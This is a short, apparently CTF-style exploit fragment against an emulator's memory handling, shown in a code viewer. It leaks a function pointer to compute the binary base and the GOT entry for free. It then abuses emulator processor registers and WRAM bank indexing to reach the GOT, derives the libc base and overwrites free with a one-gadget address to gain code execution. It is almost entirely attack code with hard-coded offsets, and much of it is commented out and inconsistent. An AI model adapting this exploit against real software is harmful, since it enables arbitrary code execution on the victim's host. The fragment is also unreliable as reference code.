blob: f289a4eab0b5f589153d9ee25560ce1f4caaac2a (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
// /* causes segfault (TESTED!) */
// // *op0x00_gb = 0;
// /* leak function pointer and base / got */
// op0x00 = *op0x00_gb;
// base = op0x00 - 0x1d420;
// free_got = base + 0x4ad78;
// /* use processor registers to read / write */
// processor + 0x2068
// /* reset wram bank to point to GOT */
wrambanks = processor_addr + 0x126a0;
target_index = (free_got - wrambanks) / 0x1000;
if ((free - wrambanks) % 0x1000 != 0)
target_index -= 1;
// /* replace free with one gadget */
// free_gb = (void*)free_got - (wrambanks - target_index * 0x1000) + 0xD000;
// free = *(free_gb);
// libc = free - 0x9a6d0;
// onegadget = libc + 0xe3afe;
// *free_gb = onegadget;
|
